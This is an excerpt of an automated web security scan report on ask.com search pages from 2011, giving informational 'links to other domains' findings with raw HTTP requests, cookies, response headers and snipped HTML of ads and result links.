<a href="http://www.google.com/aclk?sa=l&ai=CzzOGG8tBTfPMMt-PmQe68uGAD9vO8tsBk7izyxfr17kIEAEg-_6BAygFUIfc5pcHYMmGo4fUo4AQkAECoAG50r__A8gBAaoEHE_Qqd-KG7mM8E9d77F0rcDDxtbitYiPCBxZ940&num=1&sig=AGiWqtxhYYXQ7Wq6ukoslZ5MN-RmtC8S-Q&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(15); if (typeof efclk != 'undefined') efclk(15); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_0');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CzEfvG8tBTfPMMt-PmQe68uGAD-2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q6cu1G7qM8Addcc_mA-gcutHuq1I_DHQGjvEQsuI&num=2&sig=AGiWqtz-pYPd2YOBvUM8InC1guSltW8eSg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(7); if (typeof efclk != 'undefined') efclk(7); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CzEfvG8tBTfPMMt-PmQe68uGAD-2R_78Br7bGshWQqMEHEAIg-_6BAygFUIX6pcj8_____wFgyYajh9SjgBCQAQKgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q6cu1G7qM8Addcc_mA-gcutHuq1I_DHQGjvEQsuI&num=2&sig=AGiWqtz-pYPd2YOBvUM8InC1guSltW8eSg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(7); if (typeof efclk != 'undefined') efclk(7); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_1');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CsYRRG8tBTfPMMt-PmQe68uGAD5yQkeEBpIyLrBTc66IsEAMg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_QubCBG7uM8Addcd7nzMfP2AxSseDQcWA&num=3&sig=AGiWqtwjOou5bPGjkRcI55a9vOnbi23Z3Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(46); if (typeof efclk != 'undefined') efclk(46); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_2');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CsYRRG8tBTfPMMt-PmQe68uGAD5yQkeEBpIyLrBTc66IsEAMg-_6BAygFUKuO7fEFYMmGo4fUo4AQkAECoAGA6M38A8gBAaoEGU_QubCBG7uM8Addcd7nzMfP2AxSseDQcWA&num=3&sig=AGiWqtwjOou5bPGjkRcI55a9vOnbi23Z3Q&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(46); if (typeof efclk != 'undefined') efclk(46); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_2');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CtFKvG8tBTfPMMt-PmQe68uGAD4WC_sYBtYbU7gm9qYcHEAQg-_6BAygFUILDy_j-_____wFgyYajh9SjgBCQAQLIAQGqBBtP0Pn7gxu8hPC_XvAF5XUaoHgHk88zSh6Quvw&num=4&sig=AGiWqtypoc8X3Zt7IHIwIEDBqwl71RkLGA&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(45); if (typeof efclk != 'undefined') efclk(45); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_3');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CtFKvG8tBTfPMMt-PmQe68uGAD4WC_sYBtYbU7gm9qYcHEAQg-_6BAygFUILDy_j-_____wFgyYajh9SjgBCQAQLIAQGqBBtP0Pn7gxu8hPC_XvAF5XUaoHgHk88zSh6Quvw&num=4&sig=AGiWqtypoc8X3Zt7IHIwIEDBqwl71RkLGA&adurl=http://www.pressure-controls.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(45); if (typeof efclk != 'undefined') efclk(45); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_3');" class="nu" onmouseover="return ss('www.pressure-controls.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CeqUSG8tBTfPMMt-PmQe68uGAD4mdlFO5_fqgA8XU-SsQBSD7_oEDKAVQhYnL5gJgyYajh9SjgBCQAQLIAQGqBBlP0MmJlxu9jPAHXXHe58zHz9gMUrHg0HFg&num=5&sig=AGiWqtwuMyE62WG_PdXdH1Pq4dKoZVFpng&adurl=http://www.sailorman.com/used_gear.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(12); if (typeof efclk != 'undefined') efclk(12); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_4');" class="nu" onmouseover="return ss('www.sailorman.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CeqUSG8tBTfPMMt-PmQe68uGAD4mdlFO5_fqgA8XU-SsQBSD7_oEDKAVQhYnL5gJgyYajh9SjgBCQAQLIAQGqBBlP0MmJlxu9jPAHXXHe58zHz9gMUrHg0HFg&num=5&sig=AGiWqtwuMyE62WG_PdXdH1Pq4dKoZVFpng&adurl=http://www.sailorman.com/used_gear.php" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(12); if (typeof efclk != 'undefined') efclk(12); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D284d7O-Hf%2525%26sgch%3Dad44FsvmY'},'gg_4');" class="nu" onmouseover="return ss('www.sailorman.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.25. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=Is+there+lead+in+reusable+grocery+bags%3F&gc=1&qsrc=3066&o=0&l=dir

The response contains the following links to other domains:

http://66.235.120.67/e?t=4583401241928196370
http://abcnews.go.com/Business/wireStory?id=12143990
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=Is+there+lead+in+reusable+grocery+bags%3F
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://c.moreover.com/click/here.pl?z3976099917&z=1250248829
http://c.moreover.com/click/here.pl?z3983099646&z=1250248841
http://c.moreover.com/click/here.pl?z3983155500&z=1250248829
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-3386161?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://spiderx.wordpress.com/
http://www.askkids.com/?o=0&l=dir
http://www.digtriad.com/news/local_state/article.aspx?storyid=150621
http://www.green-kits.com/
http://www.ityse.com/
http://www.msnbc.msn.com/id/40139816/ns/us_news-environment/
http://www.nydailynews.com/ny_local/2010/11/15/2010-11-15_reusable_grocery_bags_made_in_china_found_to_contain_lead_fueling_calls_for_fda_.html
http://www.nytimes.com/2010/11/15/nyregion/15bags.html
http://www.reuseit.com/
http://www.thedailygreen.com/green-homes/eco-friendly/lead-in-reusable-shopping-bags-461110

Request

GET /web?q=Is+there+lead+in+reusable+grocery+bags%3F&gc=1&qsrc=3066&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:22 GMT; Path=/
Set-Cookie: clc=U2hvcHBpbmcvQXJ0c19hbmRfRW50ZXJ0YWlubWVudC9BcnRzX2FuZF9DcmFmdHNfU3VwcGxpZXM.; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:22 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:22 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.|SXMrdGhlcmUrbGVhZCtpbityZXVzYWJsZStncm9jZXJ5K2JhZ3MlM0Y.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjIyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:22 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:22 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Content-Length: 127983

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=Is+there+lead+in+reusable+grocery+bags%3F"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<span><a class="title txt3" href="http://www.nydailynews.com/ny_local/2010/11/15/2010-11-15_reusable_grocery_bags_made_in_china_found_to_contain_lead_fueling_calls_for_fda_.html" onmousedown="return pk(this,{en:'da',io:'1',b:'a001',tp:'31',ec:'4',ex:'da_sn%3D00090%26da_lhs%3D1928506%26da_lhx%3DDA%253A%2BLifestyles%26da_rhs%3D1928569%26da_rht%3DLink%26da_rhx%3DNY%2BDaily%2BNews%26da_sro%3D1928563%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DIs%2Bthere%2Blead%2Bin%2Breusable%2Bgrocery%2Bbags'});" target="_blank" >NY Daily News</a>
...[SNIP]...
<span><a class="title txt3" href="http://www.nytimes.com/2010/11/15/nyregion/15bags.html" onmousedown="return pk(this,{en:'da',io:'2',b:'a001',tp:'31',ec:'4',ex:'da_sn%3D00090%26da_lhs%3D1928506%26da_lhx%3DDA%253A%2BLifestyles%26da_rhs%3D1962856%26da_rht%3DLink%26da_rhx%3DNYTimes.com%26da_sro%3D1928563%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DIs%2Bthere%2Blead%2Bin%2Breusable%2Bgrocery%2Bbags'});" target="_blank" >NYTimes.com</a>
...[SNIP]...
<span><a class="title txt3" href="http://www.thedailygreen.com/green-homes/eco-friendly/lead-in-reusable-shopping-bags-461110" onmousedown="return pk(this,{en:'da',io:'3',b:'a001',tp:'31',ec:'4',ex:'da_sn%3D00090%26da_lhs%3D1928506%26da_lhx%3DDA%253A%2BLifestyles%26da_rhs%3D1962864%26da_rht%3DLink%26da_rhx%3DThe%2BDaily%2BGreen%26da_sro%3D1928563%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DIs%2Bthere%2Blead%2Bin%2Breusable%2Bgrocery%2Bbags'});" target="_blank" >The Daily Green</a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="r_t1"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a002',tp:'d',ec:'1'})" href="http://abcnews.go.com/Business/wireStory?id=12143990" class="title txt_lg" >Probe of <b>
...[SNIP]...

<a onmousedown="return pk(this,{en:'ni',io:'0',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3976099917&amp;z=1250248829" onmouseover="return ss('http://content.usatoday.com/communities/greenhouse/post/2011/01/buying-lead-free-reusable-shopping-bags/1?csp=34')" onmouseout="cs()" >

<img src="http://66.235.120.67:80/e?t=4583401241928196370" alt="" border="0" height="50" style="border:solid 1px #ccc">

</a>
...[SNIP]...
<div class="T3" style="text-align:center">
<a class="L3" onmousedown="return pk(this,{en:'ni',io:'0',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3976099917&amp;z=1250248829" onmouseover="return ss('http://content.usatoday.com/communities/greenhouse/post/2011/01/buying-lead-free-reusable-shopping-bags/1?csp=34')" onmouseout="cs()" >Source</a>
...[SNIP]...
<div class="pl10">

<a class="txt3 title" onmousedown="return pk(this,{en:'ns',io:'0',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3976099917&amp;z=1250248829" onmouseover="return ss('http://content.usatoday.com/communities/greenhouse/post/2011/01/buying-lead-free-reusable-shopping-bags/1?csp=34')" onmouseout="cs()" >How to buy <b>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'1',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3983155500&amp;z=1250248829" onmouseover="return ss('http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2011/01/25/MN471HDLGM.DTL&tsp=1')" onmouseout="cs()" >Paper? Plastic? <b>
...[SNIP]...
<div class="pl10">

<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'2',b:'a003',tp:'d',ec:'6'})" href="http://c.moreover.com/click/here.pl?z3983099646&amp;z=1250248841" onmouseover="return ss('http://feeds.sfgate.com/click.phdo?i=afcddb3a99db5952185055c6728459e0')" onmouseout="cs()" >Studies find <b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.msnbc.msn.com/id/40139816/ns/us_news-environment/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Newspaper finds <b>
...[SNIP]...
<td>

<a id="r4_t" href="http://www.nytimes.com/2010/11/15/nyregion/15bags.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Even <b>
...[SNIP]...
<td>

<a id="r5_t" href="http://www.reuseit.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" >Reusables for every part of your life - Reuseit.com</a>
...[SNIP]...
<td>

<a id="r6_t" href="http://spiderx.wordpress.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<div id="r_t6"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a008',tp:'d',ec:'1'})" href="http://www.digtriad.com/news/local_state/article.aspx?storyid=150621" class="title txt_lg" >Do <b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.green-kits.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r9_t" href="http://www.ityse.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >iTySE > Home</a>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-3386161?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.26. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?qsrc=2990&o=0&l=dir&q=regulator+boat+north+carolina

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CPXStL-Q26YCFYGo4AodiH9H9A/aj-cat.png
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat+north+carolina
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://companydatabase.org/c/communications-services-nec/marine-operators/marine-offshore/quality-marine/north-carolina/manufacturing-facility/regulator-marine.html
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-275393088?
http://govguru.com/north-carolina/boat-registration
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir
http://www.atlanticmarinesales.com/
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html
http://www.google.com/aclk?sa=L&ai=CBcTIpshBTfXnGIHRggeI_52iD8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QJ2Mm19eIt88fxnwF-VMVLTmdwpU&num=1&sig=AGiWqtze32AnFMFHBQecM1Ts5ijRpu1ILg&adurl=http://www.AtlanticMarineSales.com
http://www.google.com/aclk?sa=L&ai=Ca9pxpshBTfXnGIHRggeI_52iD8mNwHPR0I-RDdbRiAcQAiD7_oEDKAVQlbmT_wZgyYaAgKQkyAEBqQIb5ln_5sK6PqoEG0_QJ0Zs19SAti4d_Z_3kV77mBbMz8jcNapfKA&num=2&sig=AGiWqtyxBsoR2RxYtwOSmJPTlbjoOczX6g&adurl=http://www.pharmalinkconsulting.co.uk
http://www.google.com/aclk?sa=L&ai=CnJ4mpshBTfXnGIHRggeI_52iD42hwtsBtZCmiRy1kPfZJxADIPv-gQMoBVDI4ZSn_P____8BYMmGgICkJMgBAaoEGE_QJ3Ij19WAty4dpJ5Nqa7xd7ApHX2L-Q&num=3&sig=AGiWqtwJkZvMCM3a4nLjjEALMI8I912qSw&adurl=http://northcarolina.localguides.com/ypcyellow/controls_control_systems_regulators.html%3Futm_source%3Dgoogle_state%26utm_medium%3Dcpc%26utm_campaign%3Dypc
http://www.google.com/aclk?sa=L&ai=CoKhbpshBTfXnGIHRggeI_52iD4r8pMUBor7AiBLmnfAEEAUg-_6BAygFUNv0seIEYMmGgICkJMgBAaoEG0_QFw8w19OAti4d_Z_3kV77mBbMz8jcNapfKA&num=5&sig=AGiWqtxMUb81cAfa3sGbosfNazzLWyplZA&adurl=http://www.boatcourse.com
http://www.google.com/aclk?sa=l&ai=C03N8pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqtx7fvkjq-FPUXetrx0rBHLCTXekSA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing
http://www.google.com/aclk?sa=l&ai=CbXCppshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&sig=AGiWqty9AU2z5HQ5Av4iaTnBSBRtihQRQw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts
http://www.google.com/aclk?sa=l&ai=Cj5VipshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtxc61gShCpVjAqxz9VqeZ9M5wOUhQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats
http://www.google.com/aclk?sa=l&ai=CvI3VpshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqty8pQ7Y8Lj6tCO7EnzMk1Y_6BqUwQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture
http://www.google.com/aclk?sa=l&ai=CygR9pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtyRJ8QfhDv5_bWQ-EfPU6s60-F5AQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool
http://www.marine-world.com/brokers/589.html
http://www.regulatormarine.com/
http://www.regulatormarine.com/quality.html
http://www.starlingmarine.com/
http://www.tunaduck.com/boat.html
http://www.tunaduck.com/links.html

Request

GET /web?qsrc=2990&o=0&l=dir&q=regulator+boat+north+carolina HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=regulator+boat&search=&qsrc=0&o=0&l=dir
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; qh=1-cmVndWxhdG9yK2JvYXQ.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5488|0~5489|0~5490|1; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.2.10.1296155592; wz_sid=014DDB4118C033B329ACD8C41BD460F3; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE1LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:33:58 GMT
Connection: close
Vary: Accept-Encoding
